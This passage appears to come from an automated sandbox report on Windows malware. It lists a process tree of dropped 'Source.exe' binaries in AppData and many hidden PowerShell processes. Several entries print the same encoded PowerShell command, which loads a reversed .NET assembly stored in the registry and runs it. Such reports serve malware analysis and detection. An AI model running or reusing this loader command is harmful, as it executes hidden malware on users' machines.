  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4336
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5496
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4100

C:\Users\Admin\AppData\Local\Items\ushiwk\Source.exe
C:\Users\Admin\AppData\Local\Items\ushiwk\Source.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2044
- C:\Users\Admin\AppData\Local\Items\ushiwk\Source.exe
  C:\Users\Admin\AppData\Local\Items\ushiwk\Source.exe
  2⤵
  - Executes dropped EXE
  PID:3788

C:\Users\Admin\AppData\Roaming\HasVarArgs\Source.exe
C:\Users\Admin\AppData\Roaming\HasVarArgs\Source.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6000
- C:\Users\Admin\AppData\Roaming\HasVarArgs\Source.exe
  C:\Users\Admin\AppData\Roaming\HasVarArgs\Source.exe
  2⤵
  - Executes dropped EXE
  PID:3524

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -NoExit -Enc WwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAHMAIAA9ACAAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAawBkAGIAYQBmAFwAKQAuAGYAYQBrAGEAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkALgBFAG4AdAByAHkAUABvAGkAbgB0AC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAG4AdQBsAGwAKQA=
1⤵
- Blocklisted process makes network request
PID:3016
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2772
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4048
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5012
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4504
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3372
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:740
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2704
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2616
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2668
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:1480

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -NoExit -Enc WwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAHMAIAA9ACAAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAawBkAGIAYQBmAFwAKQAuAGYAYQBrAGEAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkALgBFAG4AdAByAHkAUABvAGkAbgB0AC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAG4AdQBsAGwAKQA=
1⤵
- Blocklisted process makes network request
PID:3956
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:1844
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:972
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4992
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:6076
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5688
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2232
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5680
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:1468
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3244
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5524

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -NoExit -Enc WwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAHMAIAA9ACAAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAawBkAGIAYQBmAFwAKQAuAGYAYQBrAGEAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkALgBFAG4AdAByAHkAUABvAGkAbgB0AC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAG4AdQBsAGwAKQA=
1⤵
- Blocklisted process makes network request
PID:1256
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2420
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4924
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2020
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3260
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2988
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5192
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3296
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:1304
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2312
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4724

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -NoExit -Enc WwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAHMAIAA9ACAAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAawBkAGIAYQBmAFwAKQAuAGYAYQBrAGEAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkALgBFAG4AdAByAHkAUABvAGkAbgB0AC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAG4AdQBsAGwAKQA=
1⤵
- Blocklisted process makes network request
PID:2272
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:1572
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5232
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4428
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5628
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:1820
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:6012
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2320
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3520
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3812
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3276

C:\Users\Admin\AppData\Roaming\HasVarArgs\Source.exe
C:\Users\Admin\AppData\Roaming\HasVarArgs\Source.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5720
- C:\Users\Admin\AppData\Roaming\HasVarArgs\Source.exe
  C:\Users\Admin\AppData\Roaming\HasVarArgs\Source.exe
  2⤵
  - Executes dropped EXE
  PID:4972

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -NoExit -Enc WwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAHMAIAA9ACAAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAawBkAGIAYQBmAFwAKQAuAGYAYQBrAGEAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkALgBFAG4AdAByAHkAUABvAGkAbgB0AC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAG4AdQBsAGwAKQA=
1⤵
- Blocklisted process makes network request
PID:1752
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:1528
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4224
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2124
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5908
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3824
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5968
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:6000
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2292
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4716
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3404

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -NoExit -Enc WwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAHMAIAA9ACAAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAawBkAGIAYQBmAFwAKQAuAGYAYQBrAGEAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkALgBFAG4AdAByAHkAUABvAGkAbgB0AC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAG4AdQBsAGwAKQA=
1⤵
- Blocklisted process makes network request
PID:5864
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:6084
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3544
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2656
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4448
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:248
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:676
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4068
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5940
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:1736
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2804

C:\Users\Admin\AppData\Local\Items\ushiwk\Source.exe
C:\Users\Admin\AppData\Local\Items\ushiwk\Source.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1644
- C:\Users\Admin\AppData\Local\Items\ushiwk\Source.exe
  C:\Users\Admin\AppData\Local\Items\ushiwk\Source.exe
  2⤵
  - Executes dropped EXE
  PID:5556

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -NoExit -Enc WwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAHMAIAA9ACAAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAawBkAGIAYQBmAFwAKQAuAGYAYQBrAGEAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkALgBFAG4AdAByAHkAUABvAGkAbgB0AC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAG4AdQBsAGwAKQA=
1⤵
- Blocklisted process makes network request
PID:2268
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5620
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:1256
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2020
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5368
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:1460
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:336
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3884
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3044
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3916
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5644

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -NoExit -Enc WwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAHMAIAA9ACAAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAawBkAGIAYQBmAFwAKQAuAGYAYQBrAGEAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkALgBFAG4AdAByAHkAUABvAGkAbgB0AC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAG4AdQBsAGwAKQA=
1⤵
- Blocklisted process makes network request
PID:1584
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:1696
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3576
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:460
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3692
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4420
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4188
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5280
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4236
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4024
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2264

C:\Users\Admin\AppData\Roaming\HasVarArgs\Source.exe
C:\Users\Admin\AppData\Roaming\HasVarArgs\Source.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3628
- C:\Users\Admin\AppData\Roaming\HasVarArgs\Source.exe
  C:\Users\Admin\AppData\Roaming\HasVarArgs\Source.exe
  2⤵
  - Executes dropped EXE
  PID:6112

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -NoExit -Enc WwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAHMAIAA9ACAAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAawBkAGIAYQBmAFwAKQAuAGYAYQBrAGEAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkALgBFAG4AdAByAHkAUABvAGkAbgB0AC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAG4AdQBsAGwAKQA=
1⤵
- Blocklisted process makes network request
PID:5464
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3292
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5124
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5684
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:1312
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3168
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5428
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:1280
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4536
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:1016
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4920

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -NoExit -Enc WwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAHMAIAA9ACAAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAawBkAGIAYQBmAFwAKQAuAGYAYQBrAGEAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkALgBFAG4AdAByAHkAUABvAGkAbgB0AC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAG4AdQBsAGwAKQA=
1⤵
- Blocklisted process makes network request
PID:1120
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4952
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4836
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:1644
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2616
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3600
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
